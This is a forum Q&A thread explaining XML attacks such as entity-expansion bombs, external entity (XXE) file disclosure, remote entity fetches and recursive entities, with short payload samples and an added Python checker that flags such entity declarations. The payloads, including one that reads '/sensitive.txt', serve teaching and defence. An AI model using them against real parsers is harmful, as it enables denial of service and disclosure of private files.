 

xml vulnerabilities

Tags:

security

xml

XML has been the backbone of the service-oriented application (SOA) and it will be a useful one in the coming future. As XML is easy and flexible, it can easily be made vulnerable and attackers can use it for their own purposes. Some of the attacks are the coercive parsing attack, XML external entity (XEE) attack, XML DoS (XDoS) attack, and XML bombs.
Can anyone tell in detail about these attacks?
How could one simulate these attacks practically in a single system?

Rohit asked Dec 15 '09 11:12



1 Answer

First we need to distinguish the effect of attack from the feature that is exploited.

Particular features of XML that can be exploited are

  • XML entities
  • Proprietary extension of parser and validator
  • Cyclic/recursive references
  • Remote access

The effects can be either

  • DOS
  • Information disclosure

I don't think there is a precise definition of a "bomb", but it refers to an attack that is particularly "compact" and which "expands". A "coercive parsing attack" exploits the nature of the XML model to overwhelm the parser.

The examples below are taken from XML Denial of Service Attacks and Defenses. Also, if you understand French, read the excellent magazine "La security des web services".

Example 1

A bomb using entities which results in a DOS because it exhausts the memory.

<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

If you have 50'000 "aaaa...aaa" and 50'0000 &a;&a;...&a;, a payload of 200KB expands to more than 2GB in memory.

Example 2

An entity could be used to access another file in an unauthorized way. This leads to information disclosure.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file SYSTEM "/sensitive.txt" >
]>
<tag> &file; </tag>

Example 3

Using the ability of certain parsers to access remote resources (see http://www.ibm.com/developerworks/xml/library/x-tipgentity.html), now go figure what happens if the file bigfile.xml is 2GB. This probably leads to a DOS.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file  SYSTEM "http://www.mysite.com/bigfile.xml" >
]>
<tag> &file; </tag>

Example 4

This recursion will lead to memory exhaustion and probably a DOS.

<!ENTITY companyname "Contoso Inc.">
<!ENTITY divisionname "&companyname; Web Products Division">

If this is schoolwork, then you should also think about how you can protect yourself from such attacks.

ewernli answered Nov 03 '22 21:11
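One way to check a document for the entity features used in Examples 1 to 4 before it reaches a parser, as an added example (not code from the answer or the article it cites): it reads the entity declarations with a regular expression and computes the expanded size arithmetically, so nothing is ever expanded or fetched. The function name, the size limit and the scaled-down sample document are assumptions made for this illustration.

```python
import re

# <!ENTITY name "value"> or <!ENTITY name SYSTEM|PUBLIC ...>
DECL = re.compile(
    r'<!ENTITY\s+([\w.-]+)\s+(?:(SYSTEM|PUBLIC)\b[^>]*|"([^"]*)"|\'([^\']*)\')\s*>')
REF = re.compile(r'&([\w.-]+);')

def audit_entities(xml_text, max_expanded=10_000_000):
    """Inspect entity declarations without expanding them; return findings."""
    findings, internal = [], {}
    for name, external, dq, sq in DECL.findall(xml_text):
        if external:  # Examples 2 and 3: local file or remote URL
            findings.append(f"external entity '{name}' ({external})")
        else:
            internal[name] = dq or sq

    sizes = {}
    def expanded_size(name, stack=()):
        if name in stack:  # entity refers back to itself
            raise ValueError(name)
        if name not in internal:  # predefined (&lt;) or external: not sized
            return 0
        if name not in sizes:
            value = internal[name]
            sizes[name] = len(REF.sub("", value)) + sum(
                expanded_size(ref, stack + (name,)) for ref in REF.findall(value))
        return sizes[name]

    try:
        for name in internal:
            expanded_size(name)
    except ValueError as cycle:
        findings.append(f"cyclic entity reference via '{cycle}'")
        return findings
    # Only references after the internal DTD subset ("]>") are document content.
    body = xml_text.split("]>", 1)[-1]
    total = sum(sizes.get(ref, 0) for ref in REF.findall(body))
    if total > max_expanded:  # Example 1: small payload, huge expansion
        findings.append(f"expands to {total} bytes (limit {max_expanded})")
    return findings

# Constructed sample: Example 1 scaled down (about 4 KB on the wire).
SAMPLE_BOMB = ('<?xml version="1.0"?><!DOCTYPE kaboom [<!ENTITY a "%s">]>'
               '<kaboom>%s</kaboom>' % ("a" * 1000, "&a;" * 1000))

if __name__ == "__main__":
    print(len(SAMPLE_BOMB), audit_entities(SAMPLE_BOMB, max_expanded=100_000))
```

A regex audit like this is only a pre-filter; the primary control is configuring the XML parser itself to reject DTDs or external entities.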